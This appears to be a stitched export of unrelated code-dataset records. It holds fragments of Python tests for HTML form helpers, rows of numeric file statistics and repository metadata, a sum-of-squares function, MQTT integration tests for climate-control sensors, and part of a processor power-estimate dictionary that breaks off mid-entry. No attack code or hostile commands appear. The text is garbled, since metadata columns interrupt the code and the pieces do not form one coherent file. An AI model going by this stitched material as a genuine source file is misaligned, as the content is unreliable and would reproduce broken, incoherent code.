        assert self.m.textarea("longtext") == expected

    def test_text_field(self):
        expected = '<input id="name" name="name" type="text" value="" />'
        assert self.m.text("name") == expected

    def test_select(self):
        rendered = self.m.select("lang", [("en", "English"), ("de", "German"), ("jp", "Japanese")])
        expected = '<select id="lang" name="lang">\n<option value="en">English</option>\n<option value="de">German</option>\n<option value="jp">Japanese</option>\n</select>'
        assert rendered == expected
| 46.222222
| 322
| 0.624059
| 1,302
| 9,568
| 4.493088
| 0.078341
| 0.035897
| 0.047863
| 0.096923
| 0.897607
| 0.891795
| 0.877265
| 0.855556
| 0.855556
| 0.844615
| 0
| 0.006113
| 0.196488
| 9,568
| 206
| 323
| 46.446602
| 0.754813
| 0.004076
| 0
| 0.688312
| 0
| 0.12987
| 0.468445
| 0.069621
| 0
| 0
| 0
| 0
| 0.24026
| 1
| 0.298701
| false
| 0.097403
| 0.019481
| 0
| 0.357143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
59bdcfd75909452802e1c3a1f3f8003b69c4464c
| 108
|
py
|
Python
|
sumofnsq_e1-1.py
|
lsm4446/study_python
|
d05077b319c98007af26c92f69f5d59fe33483d0
|
[
"BSD-2-Clause"
] | 1
|
2020-02-17T01:25:35.000Z
|
2020-02-17T01:25:35.000Z
|
sumofnsq_e1-1.py
|
lsm4446/study_python
|
d05077b319c98007af26c92f69f5d59fe33483d0
|
[
"BSD-2-Clause"
] | 2
|
2021-03-31T19:32:47.000Z
|
2021-12-13T20:33:30.000Z
|
sumofnsq_e1-1.py
|
lsm4446/study_python
|
d05077b319c98007af26c92f69f5d59fe33483d0
|
[
"BSD-2-Clause"
] | null | null | null |
def sum_of_nsqr(n):
    """Return 1**2 + 2**2 + ... + n**2 using the closed-form formula."""
    # n(n+1)(2n+1) is always divisible by 6, so // is exact here.
    numerator = n * (n + 1) * (2 * n + 1)
    return numerator // 6


print(sum_of_nsqr(10))
print(sum_of_nsqr(50))
| 18
| 36
| 0.592593
| 23
| 108
| 2.521739
| 0.521739
| 0.258621
| 0.465517
| 0.482759
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093023
| 0.203704
| 108
| 5
| 37
| 21.6
| 0.581395
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0
| 0.25
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
|
0
| 8
|
59e3f83114734c03cffc38e15824adb94a84607f
| 2,543
|
py
|
Python
|
sistem_climatizare/teste/integration_testing/test_sensor.py
|
GeorgeBodea/Sistem-climatizare
|
7ff3a32ce434b3bfb5ecdef4d56274f2386cc6a1
|
[
"MIT"
] | 1
|
2022-02-02T11:53:03.000Z
|
2022-02-02T11:53:03.000Z
|
sistem_climatizare/teste/integration_testing/test_sensor.py
|
GeorgeBodea/Sistem-climatizare
|
7ff3a32ce434b3bfb5ecdef4d56274f2386cc6a1
|
[
"MIT"
] | null | null | null |
sistem_climatizare/teste/integration_testing/test_sensor.py
|
GeorgeBodea/Sistem-climatizare
|
7ff3a32ce434b3bfb5ecdef4d56274f2386cc6a1
|
[
"MIT"
] | 4
|
2022-02-02T11:53:24.000Z
|
2022-02-05T21:57:13.000Z
|
import __init__
import pytest
import threading
import time
import paho.mqtt.client as mqtt_client
from sistem_climatizare.senzori_centralizare.basic_sensor import BasicSensor
from sistem_climatizare.senzori_centralizare.temperature_sensor import TemperatureSensor
from sistem_climatizare.senzori_centralizare.human_sensor import HumanSensor
test_passed = None
def test_sensor_outside_exists():
    """The human sensor must publish on the '<BasicSensor>/Outside' MQTT topic.

    Runs the sensor's monitor loop in a background thread, subscribes to the
    topic on a local broker, and polls up to ~10 s for any message.
    """
    def my_callback(client, user, data):
        # Any message received on the subscribed topic counts as success.
        global test_passed
        test_passed = True

    human_sensor = HumanSensor()
    t = threading.Thread(target=human_sensor.loop_monitor)
    t.start()
    global test_passed
    broker = 'localhost'
    subscriber = mqtt_client.Client("test_sensor_outside")
    subscriber.connect(broker)
    test_passed = False
    try:
        for i in range(10):
            subscriber.loop_start()
            subscriber.subscribe(BasicSensor.__name__ + "/Outside")
            subscriber.on_message = my_callback
            time.sleep(1)
            subscriber.loop_stop()
            if test_passed:
                break
        assert test_passed is True
    finally:
        # Stop the sensor thread even when the assertion fails; otherwise the
        # monitor loop keeps running and blocks the rest of the test session.
        human_sensor.stop()
def test_sensor_inside_exists():
    """The human sensor must publish on the '<BasicSensor>/Inside' MQTT topic.

    Runs the sensor's monitor loop in a background thread, subscribes to the
    topic on a local broker, and polls up to ~10 s for any message.
    """
    def my_callback(client, user, data):
        # Any message received on the subscribed topic counts as success.
        global test_passed
        test_passed = True

    human_sensor = HumanSensor()
    t = threading.Thread(target=human_sensor.loop_monitor)
    t.start()
    global test_passed
    broker = 'localhost'
    subscriber = mqtt_client.Client("test_sensor_inside")
    subscriber.connect(broker)
    test_passed = False
    try:
        for i in range(10):
            subscriber.loop_start()
            subscriber.subscribe(BasicSensor.__name__ + "/Inside")
            subscriber.on_message = my_callback
            time.sleep(1)
            subscriber.loop_stop()
            if test_passed:
                break
        assert test_passed is True
    finally:
        # Stop the sensor thread even when the assertion fails; otherwise the
        # monitor loop keeps running and blocks the rest of the test session.
        human_sensor.stop()
def test_sensor_temperature_exists():
    """The temperature sensor must publish on '<BasicSensor>/Temperature'.

    Runs the sensor's monitor loop in a background thread, subscribes to the
    topic on a local broker, and polls up to ~10 s for any message.
    """
    def my_callback(client, user, data):
        # Any message received on the subscribed topic counts as success.
        global test_passed
        test_passed = True

    temperature_sensor = TemperatureSensor(1, 5)
    t = threading.Thread(target=temperature_sensor.loop_monitor)
    t.start()
    global test_passed
    broker = 'localhost'
    subscriber = mqtt_client.Client("test_sensor_temperature")
    subscriber.connect(broker)
    test_passed = False
    try:
        for i in range(10):
            subscriber.loop_start()
            subscriber.subscribe(BasicSensor.__name__ + "/Temperature")
            subscriber.on_message = my_callback
            time.sleep(1)
            subscriber.loop_stop()
            if test_passed:
                break
        assert test_passed is True
    finally:
        # Stop the sensor thread even when the assertion fails; otherwise the
        # monitor loop keeps running and blocks the rest of the test session.
        temperature_sensor.stop()
| 28.573034
| 88
| 0.702713
| 299
| 2,543
| 5.675585
| 0.207358
| 0.111962
| 0.05657
| 0.049499
| 0.785504
| 0.714791
| 0.714791
| 0.714791
| 0.714791
| 0.714791
| 0
| 0.005564
| 0.222572
| 2,543
| 88
| 89
| 28.897727
| 0.852807
| 0
| 0
| 0.72
| 0
| 0
| 0.044829
| 0.009044
| 0
| 0
| 0
| 0
| 0.04
| 1
| 0.08
| false
| 0.253333
| 0.106667
| 0
| 0.186667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
ab6aba6fc9baa0438b92a1d3a38d11c08bac7c9b
| 68,628
|
py
|
Python
|
benchmarks/SimResults/micro_pinned_train_combos/cmpD_bwavesgcccactusADMgromacs/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/micro_pinned_train_combos/cmpD_bwavesgcccactusADMgromacs/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/micro_pinned_train_combos/cmpD_bwavesgcccactusADMgromacs/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.117185,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.294731,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.627684,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.316509,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.548079,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.314339,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.17893,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.216623,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.42355,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.118583,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0114737,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.127051,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.084855,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.245634,
'Execution Unit/Register Files/Runtime Dynamic': 0.0963287,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.339111,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.838867,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 2.81423,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000677553,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000677553,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000585687,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000224289,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00121895,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00315974,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00665572,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0815733,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.18876,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.189269,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.27706,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 7.66295,
'Instruction Fetch Unit/Runtime Dynamic': 0.557718,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.109608,
'L2/Runtime Dynamic': 0.00960751,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.43105,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.54581,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.103331,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.103331,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 4.92099,
'Load Store Unit/Runtime Dynamic': 2.15874,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.254797,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.509595,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0904283,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0920702,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.322618,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0310412,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.63745,
'Memory Management Unit/Runtime Dynamic': 0.123111,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 24.3162,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.413709,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0211628,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.158067,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.592939,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 6.25634,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0889114,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.272524,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.563216,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.171676,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.276907,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.139773,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.588356,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.109997,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.98283,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.106404,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00720085,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0819805,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0532547,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.188384,
'Execution Unit/Register Files/Runtime Dynamic': 0.0604556,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.194943,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.509544,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.83626,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 1.96532e-05,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
